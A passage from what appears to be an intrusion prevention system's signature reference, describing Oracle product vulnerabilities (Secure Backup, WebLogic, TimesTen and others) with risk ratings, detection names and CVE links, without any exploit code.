https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1978
BID-35678
http://www.securityfocus.com/bid/35678
OSVDB-55904
http://www.osvdb.org/55904
Back to top

Oracle-Secure-Backup-Administration-Validate_Login-Command-Injection

About this vulnerability: A vulnerability in Oracle Secure Backup
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Input Validation
Description: A command injection vulnerability exists in Oracle Secure Backup Administration server. The vulnerability is due to insufficient filtering of user supplied data to the login.php script used in the administration server. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted HTTP request to the target host. Successful exploitation would allow for arbitrary command execution in the security context of the user running the web server of Oracle Secure Backup. The behaviour of the target is entirely dependent on the intended function of the injected command.
Situation: HTTP_CSU-Oracle-Secure-Backup-Administration-Validate_Login-Command-Injection
References:
CVE-2011-2261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2261
BID-48752
http://www.securityfocus.com/bid/48752
Back to top

Oracle-Secure-Backup-Command-Injection

About this vulnerability: An Oracle Secure Backup Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-788-5211
Last changed: sgpkg-ips-1739-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Malfunction
Description: A vulnerability in Oracle Secure Backup, version 10.2.0.2, which allows remote attackers to execute arbitrary code due to the improper sanitization of the variable rbtool.
Situation: HTTP_CRL-Oracle-Secure-Backup-Remote-Command-Execution
References:
CVE-2008-5448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5448
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

Oracle-Secure-Backup-Exec_qr-Command-Injection

About this vulnerability: Oracle login.php argument command injection
Risk: High
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Code Injection
Description: There exists a command injection vulnerability in Oracle Secure Backup. The vulnerability is due to lack of sanitation of user supplied parameters when processing HTTP requests sent to PHP program login.php. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted HTTP request to the target host. Successful exploitation would allow for arbitrary command execution in the security context of the user running the web server of Oracle Secure Backup. The behaviour of the target is entirely dependent on the intended function of the injected command.
Situation: HTTP_CRL-Oracle-Secure-Backup-Remote-Command-Execution
References:
CVE-2008-5448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5448
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

Oracle-Secure-Backup-NDMP-Connect-Username-BOF

About this vulnerability: Oracle Secure Backup Username Buffer Overflow
Risk: High
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Oracle Secure Backup. The flaw is due to insufficient boundary checking when processing NDMP requests sent to program obndmpd.exe. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System level privileges. In an attack case where code injection is not successful, the affected process will terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process, with System level privileges.
Situation: Generic_Oracle-Secure-Backup-NDMP-Username-BOF
References:
CVE-2008-5444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5444
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

Oracle-Secure-Backup-NDMP-Packet-Handling-Multiple-Denial-Of-Service

About this vulnerability: A vulnerability in Oracle Secure Backup
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Malfunction
Description: Multiple denial of service vulnerabilities exist in Oracle Secure Backup.
Situation: Generic_CS-Oracle-Secure-Backup-NDMP-Packet-Handling-Multiple-Denial-Of-Service
References:
CVE-2008-5441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5441
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

Oracle-Secure-Backup-Objectname-Variable-Command-Injection

About this vulnerability: A vulnerability in Oracle Secure Backup
Risk: High
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Input Validation
Description: A command execution vulnerability exists in Oracle Secure Backup server. The vulnerability is due to an input validation error when property_box.php script handles the $objectname Variable. A remote authenticated attacker could exploit this vulnerability by sending a specially crafted HTTP request to the target. Successful exploitation of this vulnerability may allow a remote authenticated attacker to execute arbitrary commands under the credentials of the SYSTEM account.
Situation: HTTP_CSU-Oracle-Secure-Backup-Objectname-Variable-Command-Injection
References:
CVE-2010-0906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0906
BID-41597
http://www.securityfocus.com/bid/41597
Back to top

Oracle-Secure-Backup-observiced.exe-Buffer-Overflow

About this vulnerability: An Oracle Secure Backup observiced.exe Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Oracle Secure Backup which allows remote attackers to execute arbitrary code by sending carefully crafted requests to the affected service, due to a boundary error on the daemon observiced.exe.
Situation: Generic_Oracle-Secure-Backup-observiced.exe-Buffer-Overflow-2
DNS-UDP_Oracle-Secure-Backup-observiced.exe-Buffer-Overflow
References:
CVE-2010-0072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0072
Back to top

Oracle-Secure-Backup-Server-Authentication-Bypass

About this vulnerability: Oracle Secure Backup Server authentication bypass
Risk: High
First detected in: sgpkg-ips-239-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Malfunction
Description: An authentication bypass vulnerability exists in Oracle Secure Backup server. The vulnerability is due to a flaw in the logic used to authenticate a user to the administration server. The script 'common.php' does not properly sanitize the user name variable before using it in a database query. Successful exploitation of this vulnerability allows remote attackers to bypass authentication on vulnerable installations of Oracle Secure Backup by sending a specially crafted user name variable. This would allow the attacker to log in to the vulnerable system with full administrative capabilities.
Situation: HTTP_CRL-Oracle-Secure-Backup-Authentication-Bypass
References:
CVE-2009-1977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1977
BID-35672
http://www.securityfocus.com/bid/35672
OSVDB-55903
http://www.osvdb.org/55903
Back to top

Oracle-Secure-Backup-Server-Login-Command-Injection

About this vulnerability: Oracle Secure Backup Server login command injection
Risk: High
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Code Injection
Description: There exists a command injection vulnerability in Oracle Secure Backup. The vulnerability is due to lack of sanitation of user supplied parameters when processing HTTP requests sent to CGI program login.php. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted HTTP request to the target host. Successful exploitation would allow for arbitrary command execution in the security context of the user running the web server of Oracle Secure Backup. The behaviour of the target is entirely dependent on the intended function of the injected command.
Situation: HTTP_CRL-Oracle-Secure-Backup-Remote-Command-Injection
References:
CVE-2008-5449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5449
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

Oracle-Secure-Backup-Server-Login-Cookies-Command-Injection

About this vulnerability: Oracle Secure Backup Server login cookies command injection
Risk: High
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Secure Backup
Type: Code Injection
Description: There exists a command injection vulnerability in Oracle Secure Backup. The vulnerability is due to lack of sanitation of user supplied parameters when processing HTTP requests sent to CGI program login.php. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted HTTP request to the target host. Successful exploitation would allow for arbitrary command execution in the security context of the user running the web server of Oracle Secure Backup. The behaviour of the target is entirely dependent on the intended function of the injected command.
Situation: HTTP_CRL-Oracle-Secure-Backup-Remote-Cookies-Command-Injection
HTTPS_CS-Oracle-Secure-Backup-Remote-Cookies-Command-Injection
References:
CVE-2008-4006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4006
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

Oracle-Secure-Enterprise-Search-Parameter-Cross-Site-Scripting

About this vulnerability: A cross site scripting vulnerability in Oracle Secure Enterprise Search
Risk: Moderate
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: Oracle Secure Enterprise Search
Type: Input Validation
Description: There is a cross-site scripting vulnerability in Oracle Secure Enterprise Search. The vulnerability is due to insufficient input validation of the "search_p_groups" parameter. A remote attacker can exploit this flaw by enticing the target user to open a link to a malicious URL. Successful exploitation results in the compromise of web browser cookies (including authentication cookies) associated with the site, and modification of user information.
Situation: HTTP_CSU-Oracle-Secure-Enterprise-Search-Parameter-Cross-Site-Scripting
References:
CVE-2009-1968
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1968
BID-35681
http://www.securityfocus.com/bid/35681
OSVDB-55892
http://www.osvdb.org/55892
Back to top

Oracle-Single-Sign-On-Vulnerability

About this vulnerability: An Oracle Single-Sign-On vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: Oracle 9i
Type: Malfunction
Description: A vulnerability in the Single Sign On component within Oracle Application Server which allows remote attackers to gather user information and gain access to the Oracle Enterprise system due to an issue with the way custom scripts are used in the login of Oracle Single Sign On.
Situation: HTTP_CRL-Oracle-Single-Sign-On-Vulnerability
Back to top

Oracle-Solaris-RPC-CVE-2017-3623-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Solaris
Risk: Moderate
First detected in: sgpkg-ips-974-5242
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: <os>
Type: Buffer Overflow
Description: Improper parsing of RPC requests causes a heap buffer overflow in Oracle Solaris. A successful exploit allows an attacker to run arbitrary code with root privileges on the targets system without authentication.
Situation: Generic_CS-Oracle-Solaris-RPC-CVE-2017-3623-Heap-Buffer-Overflow
References:
CVE-2017-3623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3623
Back to top

Oracle-SQL-Injection-Database-Compromise

About this vulnerability: Unauthorized database modification
Risk: High
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: SQL Injection
Description: There exists a SQL injection vulnerability in the Oracle Database products. The flaw can be triggered by a crafted call to the MDSYS.SDO_LRS package function convert_to_lrs_layer, resulting in execution of privileged SQL statements. The attacker must have the necessary privileges to create PL/SQL functions on the target server in order to trigger the vulnerability. A successful exploit allows the attacker to read and modify the contents of the database.
Situation: Generic_Oracle-SQL-Database-Compromise
TNS_Oracle-SQL-Database-Compromise
References:
CVE-2006-5340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5340
BID-20622
http://www.securityfocus.com/bid/20622
OSVDB-29832
http://www.osvdb.org/29832
Back to top

Oracle-Sys-Pbsde-Init-BOF

About this vulnerability: Buffer overflow in Oracle sys.pbsde.init procedure
Risk: High
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 9i; Oracle 10g
Type: Buffer Overflow
Description: The Oracle database server ships with a package of stored procedures called pbsbe. There is a possibility of a buffer overflow in the package's init procedure, which does not handle correctly a large third argument. A successful exploit allows remote attackers to execute arbitrary code with System privileges on Windows platforms, and with the Oracle user privileges on Unix based platforms. Regular database users should not be able to call the vulnerable procedure, but the procedure is executed before resolving privileges, allowing any authenticated user to exploit the vulnerability.
Situation: SMB-TCP_Oracle-Sys-Pbsde-Init-BOF
Generic_Oracle-Sys-Pbsde-Init-BOF
TNS_Oracle-Sys-Pbsde-Init-BOF
References:
CVE-2005-3438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3438
BID-5134
http://www.securityfocus.com/bid/5134
Back to top

Oracle-TimesTen-Evtdump-Format-Strings-Vulnerability

About this vulnerability: Oracle TimesTen evtdump format strints vulnerability
Risk: High
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Oracle TimesTen
Type: Format String
Description: There is a format string error vulnerability in TimesTen In-memory Database. The flaw is due to a input error when processing HTTP requests sent to CGI program evtdump. Remote authenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System level privileges. In an attack case where code injection is not successful, the affected process will terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process with System level privileges
Situation: HTTP_CSU-Oracle-TimesTen-Format-Strings-Vulnerability-2
References:
CVE-2008-5440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5440
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

Oracle-TimesTen-In-Memory-Database-HTTP-Request-Denial-Of-Service

About this vulnerability: A vulnerability in Oracle TimesTen In-Memory Database
Risk: Moderate
First detected in: sgpkg-ips-285-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle TimesTen
Type: Buffer Overflow
Description: A denial of service vulnerability exists in Oracle TimesTen In-Memory Database service. The vulnerability is due to an input validation error while parsing HTTP GET requests. Remote unauthenticated attackers can exploit this vulnerability by sending a specially crafted HTTP request to the timestend daemon listening on port 17000/TCP. Successful exploitation would cause the database service to terminate abnormally, resulting in the Denial of Service condition.
Situation: HTTP_CSU-Oracle-TimesTen-In-Memory-Database-HTTP-Request-Denial-Of-Service
Back to top

Oracle-TNS-Service-Name-BOF

About this vulnerability: Buffer overflow in Oracle TNS listener
Risk: High
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 8i; Oracle 9i
Type: Buffer Overflow
Description: Oracle is vulnerable to a buffer overflow in the Transparent Network Substrate (TNS) Listener.
Situation: TNS_Oracle-TNS-Service-Name-BOF
References:
CVE-2002-0965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0965
BID-4845
http://www.securityfocus.com/bid/4845
OSVDB-5041
http://www.osvdb.org/5041
Back to top

Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10272-Information-Disclosure

About this vulnerability: A vulnerability in Oracle Tuxedo
Risk: Moderate
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Tuxedo
Type: Malfunction
Description: Improper handling of protocol messages in Oracle Tuxedo causes an information disclosure vulnerability. A successful exploit may allow sensitive data to be leaked.
Situation: Generic_CS-Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10272-Information-Disclosure
References:
CVE-2017-10272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10272
Back to top

Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10278-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Tuxedo
Risk: Moderate
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Tuxedo
Type: Buffer Overflow
Description: Improper handling of client-sent requests causes a heap buffer overflow vulnerability in Oracle Tuxedo. A successful exploit allows an attacker to execute arbitrary code with the privileges of the affected process.
Situation: Generic_CS-Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10278-Heap-Buffer-Overflow
References:
CVE-2017-10278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10278
Back to top

Oracle-Virtual-Server-Agent-Command-Injection

About this vulnerability: A vulnerability in Oracle VM
Risk: High
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Oracle Virtual Server
Type: Input Validation
Description: A command injection vulnerability exists in Oracle VM. The vulnerability is due to an input validation error in proxy parameters of utl_test_url function in Oracle VM Agent when processing XML-RPC requests. A remote authenticated attacker can exploit this vulnerabilities to inject and execute arbitrary commands.
Situation: HTTP_CS-Oracle-Virtual-Server-Agent-Command-Injection
References:
CVE-2010-3582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3582
BID-44031
http://www.securityfocus.com/bid/44031
Back to top

Oracle-Warehouse-Builder-WB_OLAP-SQL-Injection

About this vulnerability: Attempt to explot a vulnerability in Oracle Warehouse Builder
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Warehouse Builder
Type: SQL Injection
Description: Oracle Warehouse Builder (OWB), a component of the Oracle Database contains an SQL injection vulnerability. The vulnerability is due to improper input validation in the OWBREPOS_OWNER.WB_OLAP_AW_REMOVE_SOLVE_ID procedure.
Situation: TNS_Oracle-Oracle-Warehouse-Builder-WB_OLAP-SQL-Injection
References:
CVE-2011-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0799
BID-47431
http://www.securityfocus.com/bid/47431
OSVDB-71956
http://www.osvdb.org/71956
Back to top

Oracle-Warehouse-Builder-WB_RT-Multiple-SQL-Injections

About this vulnerability: An attempt to exploit vulnerability in Oracle Warehouse Builder detected
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Warehouse Builder
Type: SQL Injection
Description: Oracle Warehouse Builder, a component of Oracle Database, contains multiple SQL injection vulnerabilities. The vulnerabilities are due to improper input validation in various procedures in the OWBREPOS_OWNER.WB_RT_AUDIT_SHADOW_TABLE package. Remote authenticated attackers with role OWB_O_OWBERPOS_OWNER can exploit these vulnerabilities by sending a specially crafted parameter to the affected procedures.
Situation: TNS_Oracle-Oracle-Warehouse-Builder-WB_RT-Multiple-SQL-Injections
References:
CVE-2011-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0799
BID-47431
http://www.securityfocus.com/bid/47431
OSVDB-71956
http://www.osvdb.org/71956
Back to top

Oracle-Web-Cache-Unspecified-Client-Request-Handling

About this vulnerability: A vulnerability in Oracle Application Server Web Cache
Risk: Moderate
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Server
Type: Input Validation
Description: The Oracle Web Cache contains several vulnerabilities. These vulnerabilities enable attackers to falsify log data, to perform Cross-Site Scripting attacks against administrators reviewing the Web Cache log files, to perform a denial of service, and to execute web requests which are not visible in the log.
Situation: Generic_CS-Oracle-Web-Cache-Unspecified-Client-Request-Handling-2
Generic_CS-Oracle-Web-Cache-Unspecified-Client-Request-Handling-1
HTTP_CSH-Oracle-Web-Cache-Unspecified-Client-Request-Handling-1
References:
CVE-2004-0385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0385
BID-9868
http://www.securityfocus.com/bid/9868
OSVDB-4249
http://www.osvdb.org/4249
Back to top

Oracle-Webcenter-Content-Checkoutandopen.dll-ActiveX-Control-Code-Execution

About this vulnerability: A vulnerability in Oracle WebCenter Content
Risk: Moderate
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebCenter Content
Type: Input Validation
Description: There is a remote code execution vulnerability in Oracle WebCenter Content. The vulnerability is due to insufficient validation of parameters used in the coao() and openWebdav() methods of the CheckOutAndOpen.Control ActiveX control. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation: File-Text_Oracle-Webcenter-Content-Checkoutandopen.dll-ActiveX-Code-Execution
References:
CVE-2013-1559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1559
BID-59122
http://www.securityfocus.com/bid/59122
OSVDB-92386
http://www.osvdb.org/92386
Back to top

Oracle-Webcenter-Forms-Recognition-ActiveX-Control-Arbitrary-File-Creation

About this vulnerability: A vulnerability in Oracle WebCenter Forms Recognition
Risk: Moderate
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebCenter Forms Recognition
Type: Directory Traversal
Description: There is a directory traversal vulnerability in Oracle WebCenter Forms Recognition. The vulnerability is due to insufficient validation of parameters used in the Save() method in the ActiveX control CroProj.dll. This can be exploited to write arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation: File-Text_Oracle-Webcenter-Forms-Recognition-ActiveX-File-Creation
References:
CVE-2012-1709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1709
OSVDB-81367
http://www.osvdb.org/81367
Back to top

Oracle-Webcenter-Forms-Recognition-Sssplt30.ocx-ActiveX-Vulnerability

About this vulnerability: A vulnerability in Oracle WebCenter Forms Recognition
Risk: Moderate
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebCenter Forms Recognition
Type: Directory Traversal
Description: There is a directory traversal vulnerability in Oracle WebCenter Forms Recognition. The vulnerability is due to insufficient validation of parameters used in the SaveLayout() method in the ActiveX control Sssplt30.ocx. This can be exploited to write arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation: File-Text_Oracle-Webcenter-Forms-Recognition-Sssplt30.ocx-ActiveX-Vulnerability
References:
CVE-2012-1710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1710
OSVDB-81366
http://www.osvdb.org/81366
Back to top

Oracle-WebLogic-CVE-2019-2725-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: Insufficient validation of XML data within the body of HTTP POST requests causes a desrerialization vulnerability in Oracle WebLogic. A successful exploit may allow an attacker to run arbitrary code on the target server.
Situation: File-TextId_Oracle-WebLogic-CVE-2019-2725-Insecure-Deserialization
References:
CVE-2019-2725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725
Back to top

Oracle-WebLogic-CVE-2019-2729-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There has been reported a vulnerability in Oracle Weblogic. This vulnerability could be exploited remotely without authentication. Successful exploitation might lead in arbitrary code execution.
Situation: HTTP_CRL-Oracle-WebLogic-CVE-2019-2729-Insecure-Deserialization
References:
CVE-2019-2729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2729
Back to top

Oracle-WebLogic-CVE-2019-2890-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1205-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There exist a post-auth deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_CS-Oracle-WebLogic-CVE-2019-2890-Insecure-Deserialization
References:
CVE-2019-2890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2890
Back to top

Oracle-WebLogic-CVE-2020-14625-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There exists an insecure deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_TCP-Oracle-WebLogic-CVE-2020-14625-Insecure-Deserialization
References:
CVE-2020-14625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14625
Back to top

Oracle-WebLogic-CVE-2020-14644-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There exists an insecure deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_TCP-Oracle-WebLogic-CVE-2020-14644-Insecure-Deserialization
References:
CVE-2020-14644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14644
Back to top

Oracle-WebLogic-CVE-2020-14841-IIOP-JNDI-Injection

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: High
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1298-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: A JNDI injection vulnerability has been reported in Oracle WebLogic. This vulnerability is due to improper handling of specific IIOP protocol messages. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation results in the target server retrieving a potentially malicious serialized object from an attacker controlled server which may lead to the execution of arbitrary code under the security context of the affected server.
Situation: Generic_TCP-Oracle-WebLogic-CVE-2020-14841-IIOP-JNDI-Injection
References:
CVE-2020-14841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14841
Back to top

Oracle-WebLogic-CVE-2020-2551-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There has been reported a pre-auth insecure deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_CS-Oracle-WebLogic-CVE-2020-2551-Insecure-Deserialization
References:
CVE-2020-2551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2551
Back to top

Oracle-WebLogic-CVE-2020-2798-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There has been reported an insecure deserialization vulnerability in Oracle WebLogic. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_CS-Oracle-WebLogic-CVE-2020-2798-Insecure-Deserialization
References:
CVE-2020-2798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2798
Back to top

Oracle-WebLogic-CVE-2020-2883-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: Insufficient validation of T3 requests causes an insecure deserialization vulnerability in Oracle Weblogic Server. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Oracle-WebLogic-CVE-2020-2883-Insecure-Deserialization
References:
CVE-2020-2883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2883
Back to top

Oracle-WebLogic-CVE-2020-2884-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: Insufficient validation of T3 requests causes an insecure deserialization vulnerability in Oracle WebLogic Server. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Oracle-WebLogic-CVE-2020-2884-Insecure-Deserialization
References:
CVE-2020-2884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2884
Back to top

Oracle-WebLogic-CVE-2020-2963-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: Insufficient validation of requests causes an insecure deserialization vulnerability in Oracle WebLogic. A successful attack may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Oracle-WebLogic-CVE-2020-2963-Insecure-Deserialization
References:
CVE-2020-2963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2963
Back to top

Oracle-WebLogic-Ejbtaglibdescriptor-External-Entity-Injection

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There exists an XXE vulnerability in Oracle Weblogic. This vulnerability could be remotely exploited. Successful exploitation could lead in the disclosure of file contents.
Situation: Generic_CS-Oracle-WebLogic-Ejbtaglibdescriptor-External-Entity-Injection
References:
CVE-2019-2888
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2888
Back to top

Oracle-WebLogic-Foreignrecoverycontext-External-Entity-Injection

About this vulnerability: A vulnerability in Oracle WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-1166-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle WebLogic Server
Type: Input Validation
Description: There has been reported an XXE vulnerability in Oracle Weblogic. This vulnerability could be exploited by sending a malicious request to the target server. Successful exploitation could lead in information disclosure.
Situation: Generic_CS-Oracle-WebLogic-Foreignrecoverycontext-External-Entity-Injection
References:
CVE-2019-2647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2647
Back to top

Oracle-WebLogic-Insecure-Deserialization-CVE-2021-2394

About this vulnerability: An attempt to exploit a vulnerability in Oracle WebLogic
Risk: High
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1435-5242
Platform: Generic
